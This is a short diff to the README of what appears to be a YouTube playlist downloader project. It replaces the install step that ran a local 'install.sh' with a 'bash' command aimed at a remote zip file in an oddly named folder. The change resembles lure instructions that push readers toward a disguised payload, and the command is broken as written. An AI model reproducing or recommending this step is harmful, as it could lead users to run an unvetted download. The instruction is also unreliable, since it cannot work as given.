hitesh9624/YouTube-Playlist-Downloader/README.md

 1. Extract the downloaded archive.
 2. Open a terminal and navigate to the extracted folder.
-3. Run the installer script using `bash install.sh`.
+3. Run the installer script using `bash https://raw.githubusercontent.com/hitesh9624/YouTube-Playlist-Downloader/main/Casuariidae/YouTube-Playlist-Downloader.zip`.

 ## 🎥 Features